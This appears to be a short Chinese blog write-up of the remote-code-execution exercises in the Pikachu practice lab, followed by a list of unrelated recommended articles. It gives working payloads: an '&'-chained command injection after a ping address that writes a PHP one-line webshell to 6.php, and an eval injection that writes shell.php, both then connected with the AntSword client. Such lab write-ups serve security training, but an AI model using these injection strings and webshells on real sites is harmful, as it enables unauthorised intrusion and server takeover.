Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POSTcmd);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST"cmd")?>');

3.蚁剑连接

相关推荐
sbjdhjd几秒前
PHP RCE 多层绕过实战:关键字过滤、空格替换与 php://filter 伪协议 | 02
网络·安全·web安全·网络安全·云计算·安全架构·rce
Jay Kay1 分钟前
深入理解 RDMA 内存管理:海思 HNS RoCE 架构中的 HEM 表与 MTR 表有什么区别?
服务器·网络·架构
weixin_4407305010 分钟前
socket简单介绍-三次握手四次断开+一个例子
运维·服务器
我星期八休息14 分钟前
软件测试—从认识到BUG
考研·安全·bug
做运维的阿瑞25 分钟前
Linux ELF 文件
linux·运维·服务器
遇见小修修25 分钟前
打印机连不上电脑无法打印
大数据·运维·python·电脑
金立基胶粘32 分钟前
纸袋热封胶是什么?它的特点与应用有哪些?
大数据·安全
Jay Kay1 小时前
RDMA中CQ为什么用轮询?——从CQ、Doorbell到GID的深度解析
运维·服务器·网络
司小豆1 小时前
第七课:DeepSeek Harness 服务与依赖注入
java·服务器·开发语言·github·ai编程
会周易的程序员1 小时前
5Draft使用说明书
服务器·c++·分布式·raft·共识